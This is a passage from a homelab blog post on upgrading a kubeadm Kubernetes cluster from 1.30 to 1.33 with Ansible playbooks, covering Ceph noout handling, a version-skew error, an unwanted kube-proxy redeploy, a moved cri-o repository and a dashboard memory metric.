</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;kubectl={{ kube_version_full }}*&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pin kubectl version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubectl</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">hold</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">restart kubelet</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">systemd_service</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">daemon_reload</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">restarted</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span></code></pre></div><p>And finally, the node is uncordoned:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">uncordon node</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubernetes.core.k8s_drain</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">uncordon</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span></code></pre></div><p>This command is again delegated to my command and control host. That means it is
not executed on the remote host by my Ansible user; instead, for every host the
kubectl command runs on a central host which has the necessary permissions and
credentials to actually run kubectl against the cluster.</p>
<p>The role I&rsquo;ve described above is then used in a playbook running it against
the different groups of hosts in my Homelab. First is one of the control plane
hosts, running the required first <code>kubeadm upgrade apply -y &lt;NEW_KUBE_VERSION&gt;</code>
command, which only needs to be run on the first control plane node:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">firstcp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update first kubernetes controller kubeadm</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-update-kubeadm-first</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">include cluster upgrade role</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">include_role</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-cluster-upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">kube_first_node</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_non_kubeadm</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for two minutes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">2</span>
</span></span></code></pre></div><p>Notably, this run has the <code>kube_first_node</code> variable set, but doesn&rsquo;t yet run
the non-kubeadm updates, i.e. the kubelet update.
Next come the remaining control plane nodes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_controllers:!firstcp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update other kubernetes controllers kubeadm</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-update-kubeadm</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">include cluster upgrade role</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">include_role</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-cluster-upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_non_kubeadm</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for two minutes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">2</span>
</span></span></code></pre></div><p>These nodes don&rsquo;t have <code>kube_first_node</code> set, so they execute the <code>kubeadm upgrade node</code>
command. Here, too, <code>update_non_kubeadm</code> is false, meaning the kubelets
are not updated yet. Without this, there&rsquo;s a danger that an already updated
kubelet would talk to a kube-apiserver which hasn&rsquo;t been updated yet,
potentially leading to errors.</p>
<p>After the kubeadm update follows the kubelet update for the controller nodes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_controllers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update kubernetes controllers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-update-controllers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">include cluster upgrade role</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">include_role</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-cluster-upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_kubeadm</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_non_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for vault to be running</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes.core.k8s_info</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Pod</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">label_selectors</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">app.kubernetes.io/name=vault</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">app.kubernetes.io/instance=vault</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">field_selectors</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;spec.nodeName={{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">wait</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">wait_condition</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">status</span>: <span style="color:#e6db74">&#34;True&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Ready&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">wait_sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">wait_timeout</span>: <span style="color:#ae81ff">300</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">register</span>: <span style="color:#ae81ff">vault_pod_list</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unseal vault prompt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">echo</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">prompt</span>: <span style="color:#e6db74">&#34;Please unseal vault: k exec -it -n vault {{ vault_pod_list.resources[0].metadata.name }} -- vault operator unseal&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for two minutes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">2</span>
</span></span></code></pre></div><p>This runs the role with <code>update_kubeadm: false</code> but <code>update_non_kubeadm: true</code>,
leading to the kubeadm update being skipped as it was already run in the previous
play, and instead the kubelet is being updated. This is safe to do now, because
all kube-apiservers have been updated to the new version at this point.
I&rsquo;m running a two minute pause task at the end of each play, to give the cluster
a bit of time to start all Pods again.
This kubelet update step also contains some handling of my Vault containers, which
are running on the control plane nodes. They need to be manually unsealed
when they&rsquo;re restarted.</p>
<p>Next up are the Ceph nodes, which I do not throw together with the rest of the
worker nodes as they need to be run one at a time, to prevent storage downtime.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_ceph</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update kubernetes Ceph nodes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-update-ceph</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pre_tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set osd noout</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/myuser/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd set noout</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">include cluster upgrade role</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">include_role</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-cluster-upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_non_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for OSDs to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/myuser/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd status &#34;{{ ansible_hostname }}&#34; --format json</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">register</span>: <span style="color:#ae81ff">ceph_end</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">until</span>: <span style="color:#e6db74">&#34;(ceph_end.stdout | trim | from_json | community.general.json_query(&#39;OSDs[*].state&#39;) | select(&#39;contains&#39;, &#39;up&#39;) | length) == (ceph_end.stdout | trim | from_json | community.general.json_query(&#39;OSDs[*]&#39;) | length)&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">retries</span>: <span style="color:#ae81ff">12</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delay</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for two minutes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">post_tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unset osd noout</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/myuser/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd unset noout</span>
</span></span></code></pre></div><p>I&rsquo;m also setting the <code>noout</code> flag for Ceph. This ensures that Ceph doesn&rsquo;t start
automatic rebalancing when the OSDs on the upgraded host temporarily go down.
In addition, I&rsquo;m waiting for the OSDs on each host to be up again before continuing
to the next host, to prevent storage issues.</p>
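<p>For reference, the same dance can also be done by hand, for example when only
rebooting a Ceph node outside of Ansible. A sketch, again via the Rook toolbox or
the rook-ceph krew plugin:</p>
<pre tabindex="0"><code># before taking the node down: do not mark its OSDs out
ceph osd set noout

# ...reboot or upgrade the node...

# confirm the OSDs are back up, then clear the flag again
ceph osd stat
ceph osd unset noout
</code></pre>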
<p>Last but not least are my worker nodes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_workers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update kubernetes worker nodes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-update-workers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pre_tasks</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">include cluster upgrade role</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">include_role</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-cluster-upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_non_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for one minute</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>Nothing special about these. In contrast to all the other plays, I&rsquo;m running
two hosts through this one in parallel, because I currently have enough slack in
the cluster to tolerate the loss of two workers at once.</p>
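<p>For completeness, the individual plays can be run separately via their tags. The
playbook and inventory file names in this invocation are made up, but it would look
roughly like this:</p>
<pre tabindex="0"><code># only run the worker play, two hosts at a time as per serial: 2
ansible-playbook -i inventory.yml kube-cluster-upgrade.yml --tags k8s-update-workers

# dry run of the same play
ansible-playbook -i inventory.yml kube-cluster-upgrade.yml --tags k8s-update-workers --check
</code></pre>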
<p>So now let me tell you how that beautiful theory I laid out up to now actually
worked in practice. &#x1f601;</p>
<h2 id="a-tale-of-three-updates">A tale of three updates</h2>
<p>I upgraded from Kubernetes 1.30 all the way to 1.33. None of the three went
through without at least one issue.</p>
<h3 id="updating-from-130-to-131">Updating from 1.30 to 1.31</h3>
<p>This one was the most complicated when it came to fixing the issue. I started
it with the previous iteration of my update playbook, which still fully updated
each control plane node in turn. So it first ran the kubeadm update on one
node and then immediately followed that up with updating the kubelet on that same
node.
Right on the first node, I was greeted with these errors for a number of the
Pods:</p>
<pre tabindex="0"><code>NAMESPACE     NAME                                             READY   STATUS                            RESTARTS      AGE
fluentbit     fluentbit-fluent-bit-km8r7                       0/1     CreateContainerConfigError        0             38m
kube-system   cilium-98hzq                                     0/1     Init:CreateContainerConfigError   0             14m
kube-system   cilium-envoy-tklh7                               0/1     CreateContainerConfigError        0             40m
kube-system   etcd-firstcp                                     1/1     Running                           2 (35m ago)   35m
kube-system   kube-apiserver-firstcp                           1/1     Running                           2 (35m ago)   35m
kube-system   kube-controller-manager-firstcp                  1/1     Running                           0             35m
kube-system   kube-scheduler-firstcp                           1/1     Running                           0             35m
kube-system   kube-vip-firstcp                                 1/1     Running                           0             35m
rook-ceph     rook-ceph.cephfs.csi.ceph.com-nodeplugin-bnmsd   0/3     CreateContainerConfigError        0             38m
rook-ceph     rook-ceph.rbd.csi.ceph.com-nodeplugin-hq82g      0/3     CreateContainerConfigError        0             38m
</code></pre><p>Note the error in the <code>STATUS</code> of all of the non-kube Pods. I had never heard
of a <code>CreateContainerConfigError</code> before, so I went to Google and found
<a href="https://github.com/kubernetes/kubernetes/issues/127316">this issue</a>. It identified
the problem pretty clearly, and the Kubernetes maintainers helpfully pointed
to the <a href="https://kubernetes.io/releases/version-skew-policy/#kubelet">version-skew-policy</a>.
After reading said policy multiple times, I finally realized what my error was and
updated my Ansible playbook to first update all kubeadm versions on all CP nodes
and only then start updating the kubelet. I got the error fixed by just running
the kubeadm update on the other two control plane nodes as well.</p>
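<p>The fix in the playbook essentially boils down to splitting the control plane play in two, so that kubeadm is upgraded on every node before any kubelet is touched. A rough sketch of the reordered structure, reusing the vars from the play shown earlier (host group and task names are again illustrative):</p>
<pre tabindex="0"><code># first pass: only kubeadm, on every control plane node
- hosts: k8s_control_plane
  serial: 1
  tasks:
    - name: upgrade kubeadm
      ansible.builtin.import_role:
        name: kube-cluster-upgrade
      vars:
        update_kubeadm: true
        update_non_kubeadm: false

# second pass: kubelet and the rest, now that every node runs the new kubeadm
- hosts: k8s_control_plane
  serial: 1
  tasks:
    - name: upgrade kubelet
      ansible.builtin.import_role:
        name: kube-cluster-upgrade
      vars:
        update_kubeadm: false
        update_non_kubeadm: true
</code></pre>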
<p>After that, the rest of the update went through without a hitch.</p>
<h3 id="updating-from-131-to-132">Updating from 1.31 to 1.32</h3>
<p>In this one I stumbled over the fact that I hadn&rsquo;t fully understood the
release notes for 1.32, or rather their implications. Specifically, this point
in the <a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.32.md#v1320">1.32 release notes</a>:</p>
<blockquote>
<p>kubeadm: kubeadm upgrade node now supports addon and post-upgrade phases. Users can use kubeadm upgrade node phase addon to execute the addon upgrade, or use kubeadm upgrade node &ndash;skip-phases addon to skip the addon upgrade. If you were previously skipping an addon subphase on kubeadm init you should now skip the same addon when calling kubeadm upgrade apply and kubeadm upgrade node. Currently, the post-upgrade phase is no-op, and it is mainly used to handle some release-specific post-upgrade tasks.</p></blockquote>
<p>So basically, addons like kube-proxy had been ignored during updates
up to this point, which is why my updates had worked so far. But in 1.32,
the <code>kubeadm upgrade</code> command gained the ability to also update addons. And
seemingly also deploy them if they&rsquo;re not present, because I suddenly found
kube-proxy Pods on my nodes after the upgrade.</p>
<p>I did not use kube-proxy, because I was using Cilium&rsquo;s kube-proxy replacement.
I had disabled kube-proxy in my <code>InitConfiguration</code> like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">skipPhases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;addon/kube-proxy&#34;</span>
</span></span></code></pre></div><p>But, the InitConfiguration isn&rsquo;t read during updates, and it seems that kubeadm
doesn&rsquo;t transfer this setting into the <code>kubeadm-config</code> ConfigMap during cluster
creation. So <code>kubeadm upgrade</code> didn&rsquo;t have any idea that it should be skipping
the addon, and happily deployed it on my nodes.</p>
<p>Luckily for me, it didn&rsquo;t seem to interfere with anything, and my cluster didn&rsquo;t
just collapse in on itself. I removed them all with the handy instructions from
the <a href="https://docs.cilium.io/en/stable/network/kubernetes/kubeproxy-free/#quick-start">Cilium docs</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n kube-system delete ds kube-proxy
</span></span><span style="display:flex;"><span>kubectl -n kube-system delete cm kube-proxy
</span></span></code></pre></div><p>To prevent any further issues, I edited the <code>kubeadm-config</code> ConfigMap, which can be fetched like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n kube-system configmaps kubeadm-config -o yaml
</span></span></code></pre></div><p>And added an entry <code>proxy.disabled: true</code> to it. With this, the problem did not
occur again during the subsequent 1.33 update.</p>
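<p>For reference, the relevant part of the <code>ClusterConfiguration</code> document inside that ConfigMap ends up looking roughly like this (kubeadm&rsquo;s v1beta4 config format, everything else omitted):</p>
<pre tabindex="0"><code>apiVersion: kubeadm.k8s.io/v1beta4
kind: ClusterConfiguration
proxy:
  disabled: true
</code></pre>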
<h3 id="updating-from-132-to-133">Updating from 1.32 to 1.33</h3>
<p>The last one. I was hoping it would go through without an issue, to at least
have one successful update during which I could move away from the computer and
read a bit, but no such luck.</p>
<p>During the update of the cri-o repository for 1.33, I got this error:</p>
<pre tabindex="0"><code>Failed to update apt cache: E:Failed to fetch https://pkgs.k8s.io/addons:/cri-o:/stable:/v1.33/deb/InRelease  403  Forbidden [IP: 3.167.227.100 443]
</code></pre><p>This was because cri-o&rsquo;s repos moved from k8s.io to openSUSE, see for example
<a href="https://github.com/cri-o/cri-o/issues/9341">this issue</a>. The adaption was
pretty simple, I just needed to change the address in my playbook.</p>
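<p>In my case that change is a single Ansible task pointing at the new repository. A sketch of what that could look like (task name is illustrative; the URL follows the pattern from the cri-o install docs, so double-check it for your version):</p>
<pre tabindex="0"><code>- name: configure the cri-o apt repository
  ansible.builtin.apt_repository:
    repo: &#34;deb https://download.opensuse.org/repositories/isv:/cri-o:/stable:/v1.33/deb/ /&#34;
    filename: cri-o
    state: present
</code></pre>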
<p>After that fix, the update ran through without any further issues and I was
finally done. Cost me almost a day of work, but alas, most of the issues were of
my own making.</p>
<h2 id="increased-memory-requests">Increased memory requests?</h2>
<p>And finally for something amusing. When I looked at my Homelab dashboard on
the morning after the upgrade, I found that the memory requests for my worker
nodes were suddenly in the red, with almost 83% of available capacity used:</p>
<p><figure>
    <img loading="lazy" src="resource-usage.png"
         alt="A screenshot of several Grafana gauge visualizations. They show the utilization of memory and CPU resource usage in my k8s cluster, as measured by looking at the total resource requests from all Pods in the cluster. There are three gauges, one for each of my node groups, &#39;Control Plane&#39;, &#39;Ceph&#39; and &#39;Workers&#39;. Interesting here are the values for the &#39;Workers&#39; group, which show 72.5% for the CPU resource consumption and 82.8% for the memory resource consumption."/> <figcaption>
            <p>Resource usage the morning after the update. This shows the sum of resource requests on Pods divided by the overall resources of the group of nodes.</p>
        </figcaption>
</figure>

Normally, the memory utilization sits at around 60%.</p>
<p>Thinking that the update must have changed something in how the memory utilization
was computed, or that perhaps some Deployment had increased its memory requests
after the update, I looked through my metrics, but wasn&rsquo;t able to find anything.</p>
<p>After some additional checking, I finally found the issue in how I was computing
the values for the metric:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#f92672">(</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span>
</span></span><span style="display:flex;"><span>      kube_pod_container_resource_requests{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">memory</span>&#34;}
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">and</span>
